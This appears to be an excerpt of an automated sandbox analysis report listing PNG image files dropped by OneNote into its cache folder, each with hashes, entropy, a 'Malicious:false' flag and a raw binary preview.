                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003T.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003U.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003V.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000040.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000041.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000042.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000043.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000044.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000045.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000046.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000047.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000048.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
